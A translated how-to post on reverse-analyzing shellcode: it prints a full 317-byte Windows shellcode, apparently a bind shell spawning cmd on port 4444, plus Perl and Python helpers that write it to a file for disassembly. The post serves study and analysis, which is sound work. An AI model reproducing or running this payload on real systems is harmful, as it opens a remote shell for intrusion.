Original article: How to reverse-analyze shellcode?
Author: 小心
How to reverse-analyze shellcode?
You often come across impressive shellcode without knowing where it came from, and a pile of hex digits quickly makes your eyes glaze over. Here is a method:
First use Perl to write the shellcode into a binary file, then feed that file to a disassembler, and you can read the assembly source that the shellcode corresponds to. Hehe
For example:
#!/usr/bin/perl
# Each "\xNN" escape is one raw byte of the shellcode; the '.' operator
# joins the string pieces (317 bytes in total).
$shellcode =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c".
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b".
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01".
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb".
"\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64".
"\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53".
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0".
"\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66".
"\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53".
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1".
"\x95\x68\xa4\x1a\x70\xc7\x57\xff\xd6\x6a\x10\x51".
"\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50".
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57".
"\xff\xd6\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d".
"\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93".
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff".
"\x75\x44\xff\xd6\x5b\x57\x52\x51\x51\x51\x6a\x01".
"\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83".
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\x7e\xd8\xe2\x73".
"\x53\xff\xd6\xff\xd0";
# Write in binary mode so that no byte (for example 0x0a) is altered by
# newline translation on Windows.
open(my $fh, '>', 'shellcode.bin') or die "cannot create shellcode.bin: $!";
binmode($fh);
print $fh $shellcode;
close($fh);
Then run a disassembler on shellcode.bin, for example ndisasm from the nasm package or something like W32Dasm, and you will see the corresponding assembly source and can learn from other people's shellcode! Hehe
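As an added example (my own code, not from the original post), the same workflow in Python: it decodes the "\xNN" listing into bytes, also accepting the backslash-stripped "xNN" form that copy/paste often leaves behind, writes shellcode.bin in binary mode and, if ndisasm is installed, runs it with -b 32, since ndisasm decodes in 16-bit mode by default. The sample is the first 17 bytes of the listing above; the function names are my own.

```python
import re
import shutil
import subprocess
from pathlib import Path

# Constructed sample: the first 17 bytes of the listing above, once in the
# normal "\xNN" notation and once in the backslash-stripped form.
SAMPLE_ESCAPED = r'''"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff".
"\xff\x60\x8b\x6c\x24\x24\x8b\x45\x3c";'''
SAMPLE_STRIPPED = '''"xfcx6axebx4dxe8xf9xffxff".
"xffx60x8bx6cx24x24x8bx45x3c";'''

# One byte: an optional backslash, the letter x, two hex digits.
HEX_BYTE = re.compile(r"\\?x([0-9a-fA-F]{2})")


def decode_shellcode(text: str) -> bytes:
    """Convert a Perl/C style "\\xNN" listing into raw bytes.

    Quotes, the Perl '.' concatenation operator, whitespace and line
    breaks are ignored, so the listing can be pasted in as-is.
    """
    return bytes(int(h, 16) for h in HEX_BYTE.findall(text))


def write_bin(code: bytes, path: str = "shellcode.bin") -> int:
    """Write the bytes unmodified (binary mode) and return the byte count."""
    Path(path).write_bytes(code)
    return len(code)


def disassemble(path: str = "shellcode.bin", bits: int = 32):
    """Disassemble with ndisasm if it is installed, otherwise return None.

    ndisasm decodes in 16-bit mode unless told otherwise, which turns a
    32-bit payload into nonsense, so the bit width is passed explicitly.
    """
    tool = shutil.which("ndisasm")
    if tool is None:
        return None
    result = subprocess.run([tool, "-b", str(bits), path],
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    code = decode_shellcode(SAMPLE_ESCAPED)
    print(f"wrote {write_bin(code)} bytes")
    print(disassemble() or "ndisasm not found; run: ndisasm -b 32 shellcode.bin")
```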